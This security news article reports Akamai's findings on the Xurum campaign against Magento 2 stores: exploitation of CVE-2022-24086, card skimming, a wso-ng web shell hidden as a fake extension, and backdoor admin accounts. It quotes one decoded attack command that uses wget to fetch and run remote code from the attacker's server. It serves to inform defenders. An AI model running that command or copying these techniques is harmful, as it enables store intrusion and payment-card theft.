Ongoing Xurum attacks target Magento 2 e-stores

Experts warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites using Adobe’s Magento 2 CMS.

Akamai researchers warn of ongoing attacks, dubbed Xurum, targeting e-commerce websites running the Magento 2 CMS.

The attackers are actively exploiting a server-side template injection issue, tracked as CVE-2022-24086, (CVSS score: 9.8), in Adobe Commerce and Magento Open Source.

The name Xurum comes from the domain name of the attacker’s command and control (C2) server. 

The campaign is active since at least January 2023, threat actors seem to be interested in payment stats from the orders in the victim’s Magento store placed in the past 10 days. 

In some cases, the attackers also deployed a software skimmer to capture credit card information and transmit it to a remote server.

Evidence gathered by the researchers suggests the attacks were carried out by a Russian threat actor.

The server xurum.com is physically located in the Netherlands and hosted by the Russian hosting company called VDSina.ru.

The attackers were observed attempting to execute two distinct payloads from a total of four IP addresses associated with the infrastructure of Hetzner and Shock Hosting hosting providers.

The first variant of the payload executes the “file_get_contents” PHP function to send a request to the C2 (xurum.com) to determine whether the server is vulnerable to CVE-2022-24086.

The second variant is the second-stage PHP payload that is downloaded and executed by the attackers, it is hosted on the same xurum.com server. 

“To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated using Base64 encoding and executed via the “shell_exec” PHP function (Figure 3). The obfuscated part decodes to php -r “`wget -qO– https://xurum.com/b.txt`;”.” reads the analysis published by Akamai.

The researchers reported that the attackers register a new Magento component and mask it as “GoogleShoppingAds.” The threat actors were observed using an advanced web shell named “wso-ng” that is activated only when the attacker sends the cookie “magemojo000” to the backdoor “GoogleShoppingAds” component. 

According to the author, wso-ng is a new version of the WSO webshell.

The web shell login page masquerades as an error page containing a hidden login form that attempts to siphon victim credentials.

The attackers were observed creating a backdoor admin user in Magento, named “mageplaza” or “mageworx.” These attackers used these two names because they are also the names of the popular Magento extensions stores.

Akamai researchers also observed on the xurum.com server a public exploit the CVE-2016-5195, aka Dirty COW, for Linux local privilege escalation,

“The attackers have shown a meticulous approach, targeting specific Magento 2 instances rather than indiscriminately spraying their exploits across the internet. They demonstrate a high level of expertise in Magento and invest considerable time in understanding its internals, setting up attack infrastructure, and testing their exploits on real targets.” concludes the report. “This campaign serves as a practical example of how older vulnerabilities continue to be exploited years after disclosure, as businesses struggle to keep up with patches and security measures.”

The report also includes indicators of compromise (IOCs).

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Xurum Magento attacks)